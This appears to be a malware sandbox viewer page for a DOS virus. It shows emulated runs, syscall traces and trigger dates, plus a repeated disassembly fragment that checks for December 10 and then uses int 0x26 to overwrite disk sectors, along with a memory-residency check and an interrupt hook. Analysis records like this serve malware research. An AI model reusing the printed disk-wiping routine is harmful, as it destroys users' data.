Sample viewer

vx.netlux.org/Virus.DOS.DAN.WMA.708

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:06:59.176710044Z 42 PC: 12a52 | Get date 0x12a52: cmp dx, 0xc0a
0x12a56: jne 0x12a66
0x12a58: mov ah, 0xd
0x12a5a: int 0x21
0x12a5c: xor dx, dx
0x12a5e: mov al, 2
0x12a60: mov cx, 0xfffe
0x12a63: int 0x26
0x12a65: pop ax
0x12a66: push ds
0x12a67: push es
0x12a68: dec byte ptr cs:[bp + 0x24]
0x12a6d: push 0xfaca
0x12a70: pop ax
0x12a71: int 0x21
0x12a73: cmp bx, 0xfaca
0x12a77: je 0x12a7f
0x12a79: call 0x12ab3
0x12a7c: call 0x12ae5
0x12a7f: pop es
2018-12-17T22:06:59.179805054Z 250 PC: 12a73 | UNKNOWN!
2018-12-17T22:06:59.188744413Z 74 PC: 12ac7 | Reallocate memory
2018-12-17T22:06:59.190103113Z 72 PC: 12ace | Allocate memory
2018-12-17T22:06:59.193183917Z 53 PC: 12aec | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:06:59.19483823Z 37 PC: 12afb | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:06:59.196415431Z 76 PC: 12d09 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":1901,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:44:31.49184423Z 42 PC: 12a52 | Get date 0x12a52: cmp dx, 0xc0a
0x12a56: jne 0x12a66
0x12a58: mov ah, 0xd
0x12a5a: int 0x21
0x12a5c: xor dx, dx
0x12a5e: mov al, 2
0x12a60: mov cx, 0xfffe
0x12a63: int 0x26
0x12a65: pop ax
0x12a66: push ds
0x12a67: push es
0x12a68: dec byte ptr cs:[bp + 0x24]
0x12a6d: push 0xfaca
0x12a70: pop ax
0x12a71: int 0x21
0x12a73: cmp bx, 0xfaca
0x12a77: je 0x12a7f
0x12a79: call 0x12ab3
0x12a7c: call 0x12ae5
0x12a7f: pop es
2018-12-25T11:44:31.494137156Z 250 PC: 12a73 | UNKNOWN!
2018-12-25T11:44:31.495086848Z 74 PC: 12ac7 | Reallocate memory
2018-12-25T11:44:31.49637785Z 72 PC: 12ace | Allocate memory
2018-12-25T11:44:31.498459382Z 53 PC: 12aec | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:44:31.502906618Z 37 PC: 12afb | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:44:31.505551824Z 76 PC: 12d09 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":10,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":1901,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:44:31.527737584Z 42 PC: 12a52 | Get date 0x12a52: cmp dx, 0xc0a
0x12a56: jne 0x12a66
0x12a58: mov ah, 0xd
0x12a5a: int 0x21
0x12a5c: xor dx, dx
0x12a5e: mov al, 2
0x12a60: mov cx, 0xfffe
0x12a63: int 0x26
0x12a65: pop ax
0x12a66: push ds
0x12a67: push es
0x12a68: dec byte ptr cs:[bp + 0x24]
0x12a6d: push 0xfaca
0x12a70: pop ax
0x12a71: int 0x21
0x12a73: cmp bx, 0xfaca
0x12a77: je 0x12a7f
0x12a79: call 0x12ab3
0x12a7c: call 0x12ae5
0x12a7f: pop es
2018-12-25T11:44:31.530527763Z 13 PC: 12a5c | Disk reset
2018-12-25T11:44:31.533968488Z 250 PC: 12a73 | UNKNOWN!
2018-12-25T11:44:31.535261337Z 74 PC: 12ac7 | Reallocate memory
2018-12-25T11:44:31.537893445Z 72 PC: 12ace | Allocate memory
2018-12-25T11:44:31.547678482Z 53 PC: 12aec | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:44:31.549564999Z 37 PC: 12afb | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:44:31.551733921Z 76 PC: 12d09 | Terminate with return code (Return code = '0')